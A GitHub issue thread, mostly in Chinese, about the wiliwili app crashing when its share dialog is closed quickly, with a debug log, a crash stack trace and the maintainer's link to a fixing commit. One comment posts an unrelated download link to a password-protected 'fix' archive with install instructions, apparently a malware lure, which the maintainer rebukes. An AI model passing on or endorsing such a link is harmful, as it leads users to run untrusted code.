### ISSUE TITLE
分享对话框关闭太快会导致闪退

### ISSUE THREAD

**Issue by happytommyl** [xfangfang/wiliwili#391]
分享至剪贴板/分享至动态后，如果立即右键关闭分享对话框，会导致闪退

`
21:40:37.156[0;34m[INFO][0m disableDimming: true
21:40:37.734[0;32m[DEBUG][0m Giving focus to brls::Box
21:40:37.800[0;32m[DEBUG][0m View ButtonClose: create
21:40:37.816[0;32m[DEBUG][0m Fragment ShareDialog: create
21:40:37.818[0;32m[DEBUG][0m Hiding brls::Box (id="share/hint/box")
21:40:37.820[0;32m[DEBUG][0m Adding an inputs block token (tokens=1)
21:40:37.820[0;32m[DEBUG][0m Pushing brls::Box to the focus stack
21:40:37.820[0;32m[DEBUG][0m Giving focus to QRImage (id="share/qrcode")
21:40:37.821[0;32m[DEBUG][0m Hiding brls::Dialog
21:40:37.821[0;32m[DEBUG][0m push activity to the stack
21:40:37.821[0;32m[DEBUG][0m Showing brls::Dialog
21:40:38.000[0;34m[INFO][0m App is up to date
21:40:38.001[0;32m[DEBUG][0m Removing an inputs block token (tokens=0)
21:40:38.599[0;32m[DEBUG][0m Giving focus to ShareBox (id="share/box/wechat")
21:40:38.683[0;32m[DEBUG][0m Showing brls::Box (id="share/hint/box")
21:40:38.749[0;32m[DEBUG][0m Adding an inputs block token (tokens=1)
21:40:38.749[0;32m[DEBUG][0m Hiding brls::AppletFrame (id="video/detail/frame")
21:40:38.749[0;32m[DEBUG][0m Showing brls::AppletFrame (id="video/detail/frame")
21:40:38.749[0;32m[DEBUG][0m Giving focus to brls::Box, and removing it from the focus stack
21:40:38.749[0;32m[DEBUG][0m Giving focus to brls::Box
21:40:38.751[0;32m[DEBUG][0m Hiding brls::Dialog
21:40:38.949[0;32m[DEBUG][0m Start delete top activity
21:40:38.949[0;32m[DEBUG][0m Top activity deleted
21:40:38.951[0;32m[DEBUG][0m Removing an inputs block token (tokens=0)
21:40:38.966[0;32m[DEBUG][0m delete AppletFrame brls::AppletFrame (id="brls/dialog/applet")
21:40:38.966[0;32m[DEBUG][0m Fragment ShareDialog: delete
21:40:38.966[0;32m[DEBUG][0m View ButtonClose: delete
21:40:39.415[0;32m[DEBUG][0m Hiding brls::View (id="share/hint/box")
21:40:39.416[0;31m[ERROR][0m Exception code 0xc0000005
21:40:39.416[0;31m[ERROR][0m Fault address 0x0 C:\Users\Tommy\code\wiliwili\build\wiliwili.exe
21:40:39.476[0;31m[ERROR][0m [0]: ??? + 0x0
21:40:39.476[0;31m[ERROR][0m [1]: C:\Users\Tommy\code\wiliwili\build\wiliwili.exe + 0x7ff7c32ad114
21:40:39.476[0;31m[ERROR][0m [2]: C:\Users\Tommy\code\wiliwili\build\wiliwili.exe + 0x7ff7c32acf1d
21:40:39.476[0;31m[ERROR][0m [3]: C:\Users\Tommy\code\wiliwili\build\wiliwili.exe + 0x7ff7c3574820
21:40:39.476[0;31m[ERROR][0m [4]: C:\Users\Tommy\code\wiliwili\build\wiliwili.exe + 0x7ff7c32f2d93
21:40:39.476[0;31m[ERROR][0m [5]: C:\Users\Tommy\code\wiliwili\build\wiliwili.exe + 0x7ff7c326bd0f
21:40:39.476[0;31m[ERROR][0m [6]: C:\Users\Tommy\code\wiliwili\build\wiliwili.exe + 0x7ff7c326e952
21:40:39.476[0;31m[ERROR][0m [7]: C:\Users\Tommy\code\wiliwili\build\wiliwili.exe + 0x7ff7c388dc15
21:40:39.476[0;31m[ERROR][0m [8]: C:\Users\Tommy\code\wiliwili\build\wiliwili.exe + 0x7ff7c2f312ee
21:40:39.476[0;31m[ERROR][0m [9]: C:\Users\Tommy\code\wiliwili\build\wiliwili.exe + 0x7ff7c2f31406
21:40:39.476[0;31m[ERROR][0m [10]: C:\WINDOWS\System32\KERNEL32.DLL!BaseThreadInitThunk + 0x1d
21:40:39.476[0;31m[ERROR][0m [11]: C:\WINDOWS\SYSTEM32\ntdll.dll!RtlUserThreadStart + 0x28
`
![image](https://github.com/user-attachments/assets/7cef9e27-5436-4201-a109-7d2ace5649df)

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by xfangfang** [comment]
@OtakuFra Please do not send links unrelated to this issue

**Comment by xfangfang** [comment]
@happytommyl dev分支最新的提交修复了这个问题：https://github.com/xfangfang/wiliwili/commit/cc06b89ee63c4819a53236837f15353775bdf5de

https://github.com/xfangfang/wiliwili/actions/runs/10580759354
